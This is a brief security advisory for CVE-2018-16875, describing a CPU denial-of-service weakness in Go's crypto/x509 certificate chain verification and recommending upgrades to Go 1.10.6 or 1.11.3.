CVE-2018-16875

Name of the Vulnerable Software and Affected Versions: Go versions prior to 1.10.6 Go versions 1.11.x prior to 1.11.3

Description: The crypto/x509 package of Go does not limit the amount of work performed for each chain verification, which might allow attackers to craft pathological inputs leading to a CPU denial of service. Go TLS servers accepting client certificates and TLS clients are affected.

Recommendations: For Go versions prior to 1.10.6, update to version 1.10.6 or later to resolve the issue. For Go versions 1.11.x prior to 1.11.3, update to version 1.11.3 or later to resolve the issue. As a temporary workaround, consider restricting the amount of work performed for each chain verification to prevent CPU denial of service attacks.